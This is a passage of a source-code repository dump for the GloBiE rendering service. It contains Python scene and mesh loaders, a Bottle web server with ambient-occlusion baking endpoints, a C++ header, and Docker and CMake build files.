scene.camera.projection.viewport\n scene.camera.projection.aspect = width / float(height)\n return pyglet.event.EVENT_HANDLED\n\n @window.event\n def on_draw():\n with shader:\n scene.draw()\n\n @window.event\n def on_mouse_scroll(x, y, scroll_x, scroll_y):\n # scroll the MOUSE WHEEL to zoom\n scene.camera.position.z -= scroll_y / 10.0\n\n @window.event\n def on_mouse_drag(x, y, dx, dy, button, modifiers):\n # press the LEFT MOUSE BUTTON to rotate\n if button == pyglet.window.mouse.LEFT:\n model.rotation.y += dx / 5.0\n model.rotation.x -= dy / 5.0\n\n # press the LEFT and RIGHT MOUSE BUTTONS simultaneously to pan\n if button == pyglet.window.mouse.LEFT | pyglet.window.mouse.RIGHT:\n scene.camera.position.x -= dx / 100.0\n scene.camera.position.y -= dy / 100.0\n\n # starts the application\n pyglet.app.run()\n" }, { "alpha_fraction": 0.5873146653175354, "alphanum_fraction": 0.593904435634613, "avg_line_length": 27.904762268066406, "blob_id": "ea32a702707bce733540b27ed1db3d4c1ddee00d", "content_id": "5aa23c47c44467b0fb2d19c0d6f242e2e5a5ad4c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1214, "license_type": "permissive", "max_line_length": 85, "num_lines": 42, "path": "/remote.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import hashlib\nfrom pathlib import Path\nfrom urlpath import URL\n\ncachedir = Path.cwd() / 'cache'\nif not cachedir.exists():\n cachedir.mkdir(parents=True)\n\n\nclass CachedFile(URL):\n def is_file(self):\n return False\n\n def open(self, mode='r', buffering=-1, encoding=None, errors=None, newline=None):\n return self.filename.open(mode, buffering, encoding, errors, newline)\n\n def resolve(self, strict=False):\n return self.filename.resolve(strict)\n\ndef fetch(url, suffix='.bin', force=False):\n print(\"FETCHING \" + str(url), end=\"\")\n hash = hashlib.sha1(str(url).encode('utf-8')).hexdigest()\n filename = cachedir / (hash + suffix)\n # print()\n # print(filename, end=\"\")\n\n if not filename.is_file() or force:\n print(' [Loading=', end=\"\")\n with url.get() as response:\n print(str(response.status_code) + ']')\n # info = response.info()\n # print(info.get_content_type())\n if response.status_code == 200:\n filename.write_bytes(response.content)\n else:\n return None\n else:\n print(' [' + hash[:11] + ']')\n\n cf = CachedFile(url)\n cf.filename = filename\n return cf\n" }, { "alpha_fraction": 0.46818074584007263, "alphanum_fraction": 0.4875798523426056, "avg_line_length": 34.8220329284668, "blob_id": "0ac285fc52d6e270deeb2a36b5acdd84dc0287f9", "content_id": "017b0f4f648c3e2ac0fdfee90d0d204d8de4af99", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4227, "license_type": "permissive", "max_line_length": 79, "num_lines": 118, "path": "/openctm/__init__.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "from .openctm import *\nimport scene\nimport glm\n\n\ndef read(group, file):\n print('Load', file)\n try:\n ctm = ctmNewContext(CTM_IMPORT)\n ctmLoad(ctm, bytes(str(file), 'utf-8'))\n err = ctmGetError(ctm)\n if err != CTM_NONE:\n raise IOError(\"Error loading file: \" + str(ctmErrorString(err)))\n\n # Interpret information\n hasNormals = (ctmGetInteger(ctm, CTM_HAS_NORMALS) == CTM_TRUE)\n\n method = ctmGetInteger(ctm, CTM_COMPRESSION_METHOD)\n if method == CTM_METHOD_RAW:\n methodStr = \"RAW\"\n elif method == CTM_METHOD_MG1:\n methodStr = \"MG1\"\n elif method == CTM_METHOD_MG2:\n 
methodStr = \"MG2\"\n else:\n methodStr = \"Unknown\"\n\n triCount = ctmGetInteger(ctm, CTM_TRIANGLE_COUNT)\n vertCount = ctmGetInteger(ctm, CTM_VERTEX_COUNT)\n\n # Print information\n print(\"CTM_FILE_COMMENT:\", str(ctmGetString(ctm, CTM_FILE_COMMENT)))\n print(\" CTM_NAME:\", str(ctmGetString(ctm, CTM_NAME)))\n print(\" Triangle count:\", triCount)\n print(\" Vertex count:\", vertCount)\n print(\" Has normals:\", hasNormals)\n print(\" Method:\", methodStr)\n\n # List UV maps\n uvMapCount = ctmGetInteger(ctm, CTM_UV_MAP_COUNT)\n print(\" UV maps:\", uvMapCount)\n for i in range(uvMapCount):\n print(\" CTM_UV_MAP_\" + str(i + 1) + \": \\\"\" +\n str(ctmGetUVMapString(ctm, CTM_UV_MAP_1 + i, CTM_NAME)) +\n \"\\\", ref = \\\"\" +\n str(ctmGetUVMapString(ctm, CTM_UV_MAP_1 +\n i, CTM_FILE_NAME)) + \"\\\"\")\n\n # List attrib maps\n attribMapCount = ctmGetInteger(ctm, CTM_ATTRIB_MAP_COUNT)\n print(\"Attribute maps:\", attribMapCount)\n for i in range(attribMapCount):\n print(\n \" CTM_ATTRIB_MAP_\" + str(i + 1) + \": \\\"\" +\n str(ctmGetAttribMapString(ctm, CTM_ATTRIB_MAP_1 +\n i, CTM_NAME)) + \"\\\"\")\n\n pindices = ctmGetIntegerArray(ctm, CTM_INDICES)\n pvertices = ctmGetFloatArray(ctm, CTM_VERTICES)\n\n # Get normals\n pnormals = None\n if hasNormals:\n pnormals = ctmGetFloatArray(ctm, CTM_NORMALS)\n\n # Get texture coordinates\n ptexCoords = None\n if uvMapCount > 0:\n ptexCoords = ctmGetFloatArray(ctm, CTM_UV_MAP_1)\n\n puvCoords = None\n if uvMapCount > 1:\n puvCoords = ctmGetFloatArray(ctm, CTM_UV_MAP_2)\n\n mesh = scene.Mesh('ctm')\n mesh.parent = group\n\n def readVec3(array, idx):\n return glm.vec3(array[idx * 3], array[idx * 3 + 1],\n array[idx * 3 + 2])\n\n def readVec2(array, idx):\n return glm.vec2(array[idx * 2], array[idx * 2 + 1])\n\n for i in range(triCount):\n i0, i1, i2 = pindices[i * 3], pindices[i * 3 + 1], pindices[i * 3 +\n 2]\n v0, v1, v2 = readVec3(pvertices,\n i0), readVec3(pvertices,\n i1), readVec3(pvertices, i2)\n tri = scene.Triangle(v0, v1, v2)\n\n if hasNormals:\n n0, n1, n2 = readVec3(pnormals, i0), readVec3(pnormals,\n i1), readVec3(\n pnormals, i2)\n tri.normals = (n0, n1, n2)\n\n if ptexCoords:\n t0, t1, t2 = readVec2(ptexCoords, i0), readVec2(\n ptexCoords, i1), readVec2(ptexCoords, i2)\n tri.texcoords = (t0, t1, t2)\n\n if puvCoords:\n uv0, uv1, uv2 = readVec2(puvCoords, i0), readVec2(\n puvCoords, i1), readVec2(puvCoords, i2)\n tri.globalUVs = (uv0, uv1, uv2)\n\n mesh.add(tri)\n\n group.add(mesh)\n\n except Exception as e:\n print('Exception occurred:', e)\n\n finally:\n # Free the OpenCTM context\n ctmFreeContext(ctm)\n" }, { "alpha_fraction": 0.6247654557228088, "alphanum_fraction": 0.6266416311264038, "avg_line_length": 25.649999618530273, "blob_id": "f86a1cf18a9977bf1067bdcf1a626fea47d90627", "content_id": "05eddc88218d5933359845c759eee59950c72b03", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 533, "license_type": "permissive", "max_line_length": 89, "num_lines": 20, "path": "/src/int.h", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "#ifndef INT_H\n#define INT_H\n\ntemplate <typename T, typename S>\nT numeric_cast(S x) {\n static_assert(std::numeric_limits<S>::is_integer, \"argument type is not an integer\");\n static_assert(std::numeric_limits<T>::is_integer, \"return type is not an integer\");\n\n constexpr bool sS = std::numeric_limits<S>::is_signed;\n constexpr bool sT = std::numeric_limits<T>::is_signed;\n if (sS && !sT) {\n assert(x >= 0);\n }\n\n assert(x 
<= std::numeric_limits<T>::max());\n\n return static_cast<T>(x);\n}\n\n#endif // !INT_H\n" }, { "alpha_fraction": 0.4000000059604645, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 13.166666984558105, "blob_id": "33affa0a2e278dc40702e9c4ecaaf626e6c5e613", "content_id": "3b9b23f7d4977b83f6d831c864908bf8072c158c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 85, "license_type": "permissive", "max_line_length": 15, "num_lines": 6, "path": "/requirements.txt", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "numpy>=1.17.4\nPillow>=6.2.1\nPyGLM>=1.1.2\nbottle>=0.12.17\npaste>=3.2.3\nurlpath>=1.1.4\n" }, { "alpha_fraction": 0.5312293171882629, "alphanum_fraction": 0.5402780771255493, "avg_line_length": 28.6143798828125, "blob_id": "5ed80af82380f138d70afd4d2d724fa41776838d", "content_id": "8f7385d18cd0b1037bf0535961fc200cd91bf605", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4531, "license_type": "permissive", "max_line_length": 101, "num_lines": 153, "path": "/igxc.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import json\nimport glm\nfrom remote import fetch, CachedFile\nimport scene\nimport wavefront\nimport openctm\nfrom pathlib import Path\n\n\ndef readTransform(tTransform):\n tDx = tDy = tDz = 0\n tRx = tRy = tRz = 0\n tSx = tSy = tSz = 1\n\n tf = glm.mat4(1)\n\n if tTransform is None:\n return tf\n\n if \"Position\" in tTransform:\n tPosition = tTransform[\"Position\"]\n\n if tPosition is not None:\n tDx, tDy, tDz = tPosition.get(\"X\", 0), tPosition.get(\n \"Y\", 0), tPosition.get(\"Z\", 0)\n tf = glm.translate(tf, glm.vec3(tDx, tDy, tDz))\n\n if \"Rotation\" in tTransform:\n tRotation = tTransform[\"Rotation\"]\n if tRotation is not None:\n if \"W\" in tRotation and tRotation[\"W\"] <= 1.000001:\n tRx = tRotation[\"X\"]\n tRy = tRotation[\"Y\"]\n tRz = tRotation[\"Z\"]\n tW = tRotation[\"W\"]\n R = glm.mat4_cast(glm.quat(tRx, tRy, tRz, tW))\n else:\n # only one rotation axis allowed\n tRx = glm.radians(tRotation[\"X\"])\n tRy = glm.radians(tRotation[\"Y\"])\n tRz = glm.radians(tRotation[\"Z\"])\n Rx = glm.rotate(glm.mat4(1), tRx, glm.vec3(1, 0, 0))\n Ry = glm.rotate(glm.mat4(1), tRy, glm.vec3(0, 1, 0))\n Rz = glm.rotate(glm.mat4(1), tRz, glm.vec3(0, 0, 1))\n R = Rz * Ry * Rx\n\n tf = tf * R\n\n if \"Scale\" in tTransform:\n tScaling = tTransform[\"Scale\"]\n if tScaling is not None:\n tSx, tSy, tSz = tScaling.get(\"X\", 0), tScaling.get(\n \"Y\", 0), tScaling.get(\"Z\", 0)\n tf = glm.scale(tf, glm.vec3(tSx, tSy, tSz))\n\n # print(\"LOG\", \"Position:\", tDx, tDy, tDz, \"Rotation:\", tRx, tRy, tRz, \"Scaling:\", tSx, tSy, tSz)\n return tf\n\n\ndef loadGeometry(geometry, file, parent: scene.SceneNode):\n if file is None:\n return None\n\n group = scene.Group(geometry)\n\n group.parent = parent\n if file.suffix == '.obj':\n pass # wavefront.read(group, file.open())\n\n if file.suffix == '.ctm':\n openctm.read(group, file.resolve())\n\n return group\n\n\ndef load(igxc, basepath):\n if \"Objects\" not in igxc:\n raise AttributeError(\"'Objects' not in igxc\")\n if \"Geometries\" not in igxc:\n raise AttributeError(\"'Geometries' not in igxc\")\n\n # fetch all referenced geometry\n tFileImport = dict()\n\n if 'BasePath' in igxc:\n basepath = CachedFile(igxc['BasePath'])\n\n try:\n for k, v in igxc['Geometries'].items():\n filename = basepath / v\n if filename.is_file():\n tFileImport[k] = filename\n 
else:\n tFileImport[k] = fetch(filename, v[-4:])\n # print(tFileImport[k])\n except FileNotFoundError as e:\n print(e)\n raise\n except ConnectionError as e:\n print(e)\n raise\n except Exception as e:\n print(e)\n print(type(e))\n raise\n\n print(len(tFileImport), 'files referenced in total')\n\n # traverse scene graph\n objects = dict()\n meshes = dict()\n root = None\n\n for tObject in igxc['Objects']:\n tComponentPath = tObject.get('Path')\n\n comp = scene.Group(tComponentPath)\n objects[tComponentPath] = comp\n\n if (tComponentPath == '.'):\n root = comp\n tParentPath = ''\n elif (\".\" in tComponentPath):\n tParentPath = tComponentPath[0:tComponentPath.rfind('.')]\n comp.parent = objects.get(tParentPath, root)\n comp.parent.add(comp)\n else:\n tParentPath = '.'\n root.add(comp)\n\n # print(\"LOG\", \"Processing Component\", tComponentPath, \"Parent:\", tParentPath)\n\n comp.transform = readTransform(tObject.get('Transform', None))\n\n tGeometry = tObject.get('Geometry')\n # print(\"LOG\", \"Geometry:\", tGeometry)\n if tGeometry is not None:\n # if tGeometry in meshes:\n # geo = meshes.get(tGeometry)\n # else:\n geometryFile = tFileImport.get(tGeometry)\n # print(\"LOG\", \"geometryFile:\", geometryFile)\n geo = loadGeometry(tGeometry, geometryFile, comp)\n meshes[tGeometry] = geo\n # print(\"LOG\", \"geo:\", geo)\n\n if geo is not None:\n comp.add(geo)\n else:\n print(\"LOG\", \"Geometry:\", tGeometry, \"not found\")\n\n print(len(meshes), 'meshes used in total')\n return root\n" }, { "alpha_fraction": 0.6947314143180847, "alphanum_fraction": 0.7097107172012329, "avg_line_length": 33.55356979370117, "blob_id": "2fb574549dfd9c4555f84bd35a86abeb170b4c94", "content_id": "8a879efa0e0bca36cc75ff27268620138309110a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 1936, "license_type": "permissive", "max_line_length": 255, "num_lines": 56, "path": "/Dockerfile", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "FROM ubuntu:19.04 as build\n\nMAINTAINER Stefan Lemme <[email protected]>\n\nRUN apt-get update && \\\n apt-get install -y cmake make g++ git libpng-dev python3-dev python3-pip && \\\n apt-get install -y llvm-8-dev clang-8 llvm clang libclang-8-dev libedit-dev && \\\n apt-get install -y vim git-svn cmake-curses-gui libopenctm-dev && \\\n rm -rf /var/lib/apt/lists/*\n\nWORKDIR /opt\n\nRUN git clone https://github.com/stlemme/RV.git --recursive -b standalone_80 rv_src && \\\n mkdir rv_build && \\\n cd rv_build && \\\n cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_CXX_STANDARD=14 ../rv_src && \\\n make\n\nRUN git clone https://github.com/AnyDSL/anydsl.git -b cmake-based-setup anydsl_src && \\\n mkdir anydsl_build && \\\n cd anydsl_build && \\\n cmake -DCMAKE_BUILD_TYPE=Release -DRUNTIME_JIT=ON -DBUILD_TESTING=ON -DAnyDSL_DEFAULT_BRANCH=llvm-cmake -DRV_INCLUDE_DIR=/opt/rv_src/include -DRV_LIBRARY=/opt/rv_build/src/libRV.a -DRV_SLEEF_LIBRARY=/opt/rv_build/vecmath/libgensleef.a ../anydsl_src && \\\n make\n\nRUN git clone https://github.com/pybind/pybind11 -b stable && \\\n pip3 install pytest && \\\n cd pybind11 && \\\n cmake -DCMAKE_BUILD_TYPE=Release . && \\\n make install\n\nCOPY ./requirements*.txt /opt/rendering-support-service/\n\nRUN pip3 install -r /opt/rendering-support-service/requirements.txt && \\\n pip3 install -r /opt/rendering-support-service/requirements-dev.txt\n\nCOPY . 
/opt/rendering-support-service\n\nRUN mkdir rss_build && \\\n cd rss_build && \\\n cmake -DCMAKE_BUILD_TYPE=Release -DAnyDSL_runtime_DIR=/opt/anydsl_build/share/anydsl/cmake -DPYTHON_EXECUTABLE=/usr/bin/python3 ../rendering-support-service && \\\n make dist\n\n# compose final image\nFROM ubuntu:19.04\n\nRUN apt-get update && \\\n apt-get install -y libopenctm-dev && \\\n rm -rf /var/lib/apt/lists/*\n\nCOPY --from=build /opt/rss_build/dist/GloBiE /opt/rendering-support-service/GloBiE\n\nWORKDIR /opt/rendering-support-service\n\nCMD [\"/opt/rendering-support-service/GloBiE\"]\n\nEXPOSE 8080\n\n" }, { "alpha_fraction": 0.5302973389625549, "alphanum_fraction": 0.5385773181915283, "avg_line_length": 28.853933334350586, "blob_id": "ca8f091d2202f7977d8e2a6689c7cd0afdde577b", "content_id": "bf9c9586734e23f40f99e49fd10b9cf7aef44427", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2657, "license_type": "permissive", "max_line_length": 81, "num_lines": 89, "path": "/scene.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import glm\n\n\nclass SceneNode(object):\n def __init__(self, name: str):\n self.name = name\n self.parent: SceneNode = None\n\n def accept(self, visitor):\n visitor.visit_SceneNode(self, 'forward')\n visitor.visit_SceneNode(self, 'backward')\n\n\nclass Group(SceneNode):\n def __init__(self, name):\n SceneNode.__init__(self, name)\n self.transform = glm.mat4(1)\n self.children = []\n\n def add(self, node):\n self.children.append(node)\n\n def accept(self, visitor):\n visitor.visit_Group(self, 'forward')\n for child in self.children:\n child.accept(visitor)\n visitor.visit_Group(self, 'backward')\n\n def __repr__(self):\n out = []\n for child in self.children:\n lines = repr(child).splitlines()\n out.append(\" - %s\" % lines[0])\n out += [\" \" * 3 + line for line in lines[1:]]\n # if self.transform != glm.mat4(1):\n # tf = str(self.transform) + '\\n'\n # else:\n tf = ''\n result = (\"Group (%s)\\n\" % (self.name)) + tf + '\\n'.join(out)\n if self.parent is not None:\n result = (\"Group (%s, parent %s)\\n\" %\n (self.name, self.parent.name)) + tf + '\\n'.join(out)\n return result\n\n\nclass Mesh(SceneNode):\n def __init__(self, name):\n SceneNode.__init__(self, name)\n self.triangles = []\n\n def add(self, prim):\n self.triangles.append(prim)\n\n def accept(self, visitor):\n # self.name = self.parent.parent.name\n visitor.visit_Mesh(self, 'forward')\n visitor.visit_Mesh(self, 'backward')\n\n def __repr__(self):\n result = \"Mesh (%s) with %d triangles\" % (self.name, len(\n self.triangles))\n if self.parent is not None:\n result = \"Mesh (%s, parent %s, grandparent %s) with %d triangles\" % (\n self.name, self.parent.name, self.parent.parent.name,\n len(self.triangles))\n return result\n\n\nclass Triangle(object):\n def __init__(self, v1, v2, v3):\n self.vertices = [v1, v2, v3]\n self.texcoords = None\n self.normals = None\n self.globalUVs = None\n\n def vertex(self, i, v, t, n, uv=None):\n self.vertices[i] = v\n\n if (self.texcoords is None):\n self.texcoords = []\n self.texcoords[i] = t if t is not None else glm.vec2(0.0)\n\n if (self.normals is None):\n self.normals = []\n self.normals[i] = n if n is not None else glm.vec3(0.0)\n\n if (self.globalUVs is None):\n self.globalUVs = []\n self.globalUVs[i] = uv if uv is not None else glm.vec2(0.0)\n" }, { "alpha_fraction": 0.7409783601760864, "alphanum_fraction": 0.7481956481933594, "avg_line_length": 30.9743595123291, "blob_id": 
"378bc0f387aae7c05edcb7d5550c30353076524f", "content_id": "0de091f7187e4eb97a1bd70f63876ef64cc502b7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 2494, "license_type": "permissive", "max_line_length": 208, "num_lines": 78, "path": "/CMakeLists.txt", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 3.8)\n\nset(CMAKE_CONFIGURATION_TYPES \"Debug;Release\")\n\nproject(ig_rendering_support)\n\n\nfind_package(AnyDSL_runtime REQUIRED)\ninclude_directories(${AnyDSL_runtime_INCLUDE_DIRS})\n\nset(CLANG_FLAGS -march=native)\nset(IMPALA_FLAGS --log-level info)\n\nset(IMPALA_SOURCES\n\tsrc/ao/backend_cpu.impala\n\tsrc/ao/utils.impala\n\tsrc/ao/mapping_cpu.impala\n src/core/common.impala\n src/core/cpu_common.impala\n src/core/sort.impala\n src/core/vector.impala\n src/traversal/intersection.impala\n src/traversal/stack.impala\n src/traversal/mapping_cpu.impala\n\tsrc/ao/aobench.impala\n)\n\nanydsl_runtime_wrap(AOBENCH_PROGRAM\n CLANG_FLAGS ${CLANG_FLAGS}\n IMPALA_FLAGS ${IMPALA_FLAGS}\n INTERFACE ${CMAKE_CURRENT_BINARY_DIR}/${CMAKE_CFG_INTDIR}/interface\n FILES ${IMPALA_SOURCES})\ninclude_directories(${CMAKE_CURRENT_BINARY_DIR}/${CMAKE_CFG_INTDIR})\n\nset(CPP_SOURCES\n\tsrc/main.cpp\n\tsrc/bbox.h\n\tsrc/bvh.h\n\tsrc/common.h\n\tsrc/float3.h\n\tsrc/float4.h\n\tsrc/int.h\n\tsrc/tri.h\n)\n\nfind_package(pybind11 2.2 REQUIRED)\npybind11_add_module(ig_rendering_support ${CPP_SOURCES} ${CMAKE_CURRENT_BINARY_DIR}/${CMAKE_CFG_INTDIR}/interface.h ${AOBENCH_PROGRAM} ${IMPALA_SOURCES})\ntarget_link_libraries(ig_rendering_support PRIVATE ${AnyDSL_runtime_LIBRARIES})\n\nsource_group(TREE ${CMAKE_CURRENT_SOURCE_DIR} FILES ${IMPALA_SOURCES} ${CPP_SOURCES})\nset(RUNTIME_FILES ${AOBENCH_PROGRAM})\nlist(FILTER RUNTIME_FILES INCLUDE REGEX \"\\.(impala|h|hpp)$\")\nsource_group(\"Runtime Files\" FILES ${RUNTIME_FILES})\n\nfind_package(PythonInterp 3.6 REQUIRED)\n\nset(PYINSTALLER_DELIMITER \":\")\nif(MSVC)\n\tset(COMMAND1 \"COMMAND\" \"set\")\n\tset(COMMAND2 \"COMMAND\")\n\tset(PYINSTALLER_DELIMITER \";\")\nendif()\nadd_custom_target(test_service\n ${COMMAND1} PYTHONPATH=$<TARGET_FILE_DIR:ig_rendering_support>\n ${COMMAND2} ${PYTHON_EXECUTABLE} ${CMAKE_CURRENT_SOURCE_DIR}/service.py --test\n DEPENDS ig_rendering_support\n)\n\nfind_program(PYINSTALLER_EXECUTABLE \"pyinstaller\")\n\nset(PYINSTALLER_DEPLOYFORMAT \"-F\" CACHE STRING \"Choose whether PyInstaller shall create a single file (-F) or a directory (-D)\")\nset_property(CACHE PYINSTALLER_DEPLOYFORMAT PROPERTY STRINGS \"-F\" \"-D\")\n\nadd_custom_target(dist\n ${COMMAND1} PYTHONPATH=$<TARGET_FILE_DIR:ig_rendering_support>\n ${COMMAND2} ${PYINSTALLER_EXECUTABLE} -n \"GloBiE\" ${PYINSTALLER_DEPLOYFORMAT} --add-binary \"${CMAKE_CURRENT_SOURCE_DIR}/openctm/openctm.dll${PYINSTALLER_DELIMITER}./\" ${CMAKE_CURRENT_SOURCE_DIR}/server.py\n DEPENDS ig_rendering_support\n)\n" }, { "alpha_fraction": 0.633370578289032, "alphanum_fraction": 0.6358553767204285, "avg_line_length": 29.03358268737793, "blob_id": "c1d89007d020783f22c2fb3464f7d5e6c392ab20", "content_id": "a139426d2323fce2e4d894b41808eff74b985a45", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8049, "license_type": "permissive", "max_line_length": 108, "num_lines": 268, "path": "/server.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import json\nimport os\nfrom pprint import pprint\n\nfrom pathlib import 
Path\nfrom bottle import Bottle, run, PasteServer, response, request, static_file\nfrom service import default_out, aoConfig\nfrom bakerman import BakingMan, BakingJob\nfrom util import colorprint, prepareOutFilename, default_out_dir\nfrom remote import cachedir\n\napp = Bottle()\n\nbakingMan = BakingMan()\nbakingMan.start()\n\n\ndef extractPostParams(requestParam):\n jobSource = request.POST\n try:\n # check if json entry is available\n jsonSource = request.json\n if jsonSource is not None:\n jobSource = jsonSource\n except Exception as e:\n print(\"bakeDirect: json couldn't be parsed\")\n print(e)\n # print(jobSource)\n return jobSource\n\n\ndef staticFileWithCors(filename, root, **params):\n httpResponse = static_file(filename, root, **params)\n\n httpResponse.headers['Access-Control-Allow-Origin'] = '*'\n httpResponse.headers[\n 'Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n httpResponse.headers[\n 'Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n return httpResponse\n\n\ndef PARAMETER():\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers[\n 'Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers[\n 'Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n\ndef routeWithOptions(**kwargs):\n def decorator(callback):\n kwargs['callback'] = callback\n app.route(**kwargs)\n\n kwargs['method'] = 'OPTIONS'\n kwargs['callback'] = PARAMETER\n\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers[\n 'Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers[\n 'Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n app.route(**kwargs)\n return callback\n\n return decorator\n\n\[email protected]('after_request')\ndef enable_cors():\n \"\"\"\n You need to add some headers to each request.\n Don't use the wildcard '*' for Access-Control-Allow-Origin in production.\n \"\"\"\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers[\n 'Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n response.headers[\n 'Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n\n@routeWithOptions(path='/bakeFile/<fileParam:path>', method=\"GET\")\ndef bakeFile(fileParam: str):\n global bakingMan\n\n jobParams = {\"file\": fileParam, \"resolution\": aoConfig[\"resolution\"]}\n # print(jobParams)\n jobId = bakingMan.addJob(jobParams)\n response.content_type = \"application/json\"\n return {\"jobId\": jobId}\n\n\n@routeWithOptions(path='/getFile/<filename:path>', method=\"GET\")\ndef getFile(filename):\n colorprint(\"getFile \" + filename, 33)\n return staticFileWithCors(filename, './out/', download=filename)\n\n\n@routeWithOptions(path='/removeResults/', method=\"GET\")\ndef removeResults():\n print(\"remove result files\")\n folder = default_out_dir\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path) and str(the_file).startswith(\"AO_\"):\n print(\" remove\", the_file)\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n print(\"remove cache files\")\n folder = cachedir\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n print(\" remove\", the_file)\n os.unlink(file_path)\n except Exception as e:\n 
print(e)\n\n\n@routeWithOptions(path=\"/bakeUrl/\", method=\"POST\")\ndef bakeUrl():\n global bakingMan\n # print(request)\n # print(request.POST)\n # print(request.POST.__dict__)\n # print(request.headers.__dict__)\n # print(request.method)\n\n jobSource = extractPostParams(request)\n\n urlParam = jobSource[\"url\"]\n # print(urlParam)\n\n resolutionParam = jobSource[\"resolution\"]\n resolutionValue = aoConfig[\"resolution\"]\n if resolutionParam is not None:\n resolutionValue = int(resolutionParam)\n\n args = {\"url\": urlParam, \"resolution\": resolutionValue}\n # print(args)\n\n jobId = bakingMan.addJob(args)\n response.content_type = \"application/json\"\n return {\"jobId\": jobId}\n\n\n@routeWithOptions(path=\"/bakeDirect/\", method=\"POST\")\ndef bakeDirect():\n global bakingMan\n # print(request)\n # print(request.POST)\n # print(request.POST.__dict__)\n # print(request.headers.__dict__)\n # print(request.method)\n\n jobSource = extractPostParams(request)\n\n igxcString = jobSource[\"igxcContent\"]\n # print(igxcString)\n if not igxcString or igxcString == \"null\":\n colorprint(\"No igxcContent found in POST request in bakeDirect/\", 31)\n return {\"error\": \"No igxcContent found in POST request in bakeDirect/\"}\n\n try:\n if isinstance(igxcString, str):\n igxcContent = json.loads(igxcString)\n else:\n igxcContent = igxcString\n except Exception as e:\n colorprint(\"Exception in bakeDirect/\", 31)\n print(e)\n return {\"error\": \"igxcContent couldn't be parsed\"}\n # print(igxcContent)\n\n basePath = jobSource[\"basePath\"]\n # print(basepath)\n\n resolutionValue = aoConfig[\"resolution\"]\n resolutionParam = jobSource[\"resolution\"]\n if resolutionParam is not None:\n resolutionValue = int(resolutionParam)\n\n args = {\n \"basePath\": basePath,\n \"igxcContent\": igxcContent,\n \"resolution\": resolutionValue\n }\n # print(args)\n\n jobId = bakingMan.addJob(args)\n response.content_type = \"application/json\"\n return {\"jobId\": jobId}\n\n\n@routeWithOptions(path='/pullState/<jobId>', method=\"GET\")\ndef pullState(jobId: str):\n global bakingMan\n colorprint(\"pullState id {}\".format(jobId), 33)\n\n result = {\"state\": \"undefined\"}\n if bakingMan.hasJob(jobId):\n result = bakingMan.getJob(jobId)\n\n # print(result)\n jsonResult = json.dumps(result,\n sort_keys=True,\n indent=4,\n separators=(',', ': '))\n response.content_type = \"application/json\"\n return jsonResult\n\n\n@routeWithOptions(path='/pullAll/', method=\"GET\")\ndef pullAll():\n global bakingMan\n colorprint(\"pullAll\", 33)\n result = bakingMan.getAllJobs()\n # print(result)\n jsonResult = json.dumps(result,\n sort_keys=True,\n indent=4,\n separators=(',', ': '))\n response.content_type = \"application/json\"\n return jsonResult\n\n\n@routeWithOptions(path='/getImage/<jobId>', method=\"GET\")\ndef getImage(jobId: str):\n global bakingMan\n absPath = os.path.join(os.path.abspath(\".\"), default_out_dir)\n print(absPath)\n if bakingMan.isJobFinished(jobId):\n job = bakingMan.getJob(jobId)\n fileName = job[\"jobArgs\"][\"out\"] + \".png\"\n return staticFileWithCors(fileName, absPath)\n\n\nserverConfig = {\"port\": 8080, \"host\": \"0.0.0.0\"}\n\ntry:\n with open(\"config.json\", \"r\") as f:\n configContent = json.load(f)\n if \"port\" in configContent:\n serverConfig[\"port\"] = configContent[\"port\"]\n if \"host\" in configContent:\n serverConfig[\"host\"] = configContent[\"host\"]\n if \"resolution\" in configContent:\n aoConfig[\"resolution\"] = configContent[\"resolution\"]\n print(serverConfig)\n 
